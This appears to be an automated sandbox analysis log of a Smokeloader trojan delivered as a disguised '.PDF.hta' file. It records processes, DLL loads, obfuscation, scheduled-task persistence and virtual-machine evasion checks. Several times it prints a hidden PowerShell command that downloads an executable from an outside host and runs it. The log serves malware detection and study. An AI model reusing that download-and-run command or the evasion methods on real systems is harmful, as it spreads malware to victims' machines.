Source: 00000008.00000002.476491461.0000000000251000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: EkXH.exe.1.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vgjfftu.5.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winHTA@8/6@24/1
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0066C317 CreateToolhelp32Snapshot,Module32First, 4_2_0066C317
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\3whyeuor.ju0.ps1 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\3388.PDF.hta"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe"
Source: unknown Process created: C:\Windows\System32\taskeng.exe taskeng.exe {A18241FA-0367-40E9-BBC3-15CE4DAD052A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftu
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Local\Temp\EkXH.exe "C:\Users\user\AppData\Local\Temp\EkXH.exe" Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process created: C:\Users\user\AppData\Roaming\vgjfftu C:\Users\user\AppData\Roaming\vgjfftu Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d2d1.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d11.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: d3d10warp.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: credssp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfplat.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: ktmw32.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\taskeng.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Section loaded: msvcr100.dll Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: 3388.PDF.hta Static file information: File size 4178844 > 1048576
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Unpacked PE file: 4.2.EkXH.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\vgjfftu Unpacked PE file: 8.2.vgjfftu.400000.1.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:EW;
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path" Jump to behavior
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0040237B push 000023C2h; retn 0023h 4_2_0040238B
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_004025DC push ebp; ret 4_2_004025FC
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00401284 pushad ; iretd 4_2_00401286
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00222643 push ebp; ret 4_2_00222663
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_002223E2 push 000023C2h; retn 0023h 4_2_002223F2
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_002212EB pushad ; iretd 4_2_002212ED
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0066EB61 push es; retf 4_2_0066EB78
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00673874 push esp; ret 4_2_00673875
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_0066D03C pushad ; iretd 4_2_0066D03E
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Code function: 4_2_00670291 push ebx; ret 4_2_00670294
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0040237B push 000023C2h; retn 0023h 8_2_0040238B
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_004025DC push ebp; ret 8_2_004025FC
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00401284 pushad ; iretd 8_2_00401286
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_00222643 push ebp; ret 8_2_00222663
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_002223E2 push 000023C2h; retn 0023h 8_2_002223F2
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_002212EB pushad ; iretd 8_2_002212ED
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0099CC1C pushad ; iretd 8_2_0099CC1E
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_009A3454 push esp; ret 8_2_009A3455
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0099E741 push es; retf 8_2_0099E758
Source: C:\Users\user\AppData\Roaming\vgjfftu Code function: 8_2_0099FE71 push ebx; ret 8_2_0099FE74
Source: EkXH.exe.1.dr Static PE information: section name: .text entropy: 7.486630625699931
Source: vgjfftu.5.dr Static PE information: section name: .text entropy: 7.486630625699931

Persistence and Installation Behavior
barindex
Tries to download and execute files (via powershell)
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path"
Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -WindowStyle Hidden -Command "$path = $Env:temp + '\EkXH.exe'; $client = New-Object System.Net.WebClient; $client.downloadfile('http://ukr-net-filesrever.pw/download/svc.exe',$path); Start-Process -FilePath $path" Jump to behavior
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\EkXH.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\vgjfftu Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\vgjfftu Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\vgjfftu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\taskeng.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Checks if the current machine is a virtual machine (disk enumeration)
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\IDE Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Source: C:\Users\user\AppData\Roaming\vgjfftu Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI Jump to behavior
Found evasive API chain (may stop execution after checking system information)
Source: C:\Users\user\AppData\Roaming\vgjfftu Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\Temp\EkXH.exe API/Special instruction interceptor: Address: 7731C7BA
